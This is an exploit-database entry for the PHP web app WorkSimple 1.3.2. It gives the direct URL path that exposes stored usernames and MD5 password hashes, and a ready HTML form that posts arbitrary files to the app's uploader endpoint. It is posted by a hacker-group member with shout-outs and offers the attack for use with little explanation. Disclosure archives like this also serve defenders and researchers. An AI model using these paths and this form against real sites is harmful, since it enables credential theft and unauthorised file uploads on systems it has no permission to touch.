WorkSimple 1.3.2 - Multiple Vulnerabilities

EDB-ID:

11550

CVE:

N/A


Author:

JIKO

Type:

webapps


Platform:

PHP

Date:

2010-02-23


[ Multiple Remote Vulnerabilities ]
----------[Script Info]

Moi : JIKO
Site : No-exploit.Com
Email : mm :( Moghla9 Ferme Closed

----------[Script Info]

Name : WorkSimple
Site:http : http://geekness.eu/ or http://easton.4fd.us/
Download : http://geekness.eu/sites/default/files/worksimple_1.3.2.zip

----------[exploit Info]

1]~[Password Disclosure Vulnerability]

For All Version

http://localhost/Path/data/secret.php

Name:Md5(Pass)

1]~[Remote File Upload Vulnerability]
file :/modules/uploader.php?startupload
array(".phps",".txt",".html",".png", ".html", ".htm",".jpg",".png", ".bmp",".c",".cpp", ".css", ".h", ".gif", ".torrent", ".jpeg");
---
<form enctype='multipart/form-data' action='[SITE]/modules/uploader.php?startupload' method='post'>
<input type='hidden' name='MAX_FILE_SIZE' value='500000' />
Upload a file: <input name='uploadedfile' size='14' type='file' />
<BR><BR>
<input class='button' type='submit' value='upload' />
</form>
---

HxH, Cyb3r-DeViL, leopard, ZaIdOoHxHaCkEr, virusman, The Sadhacker,
Member No-exploit.Com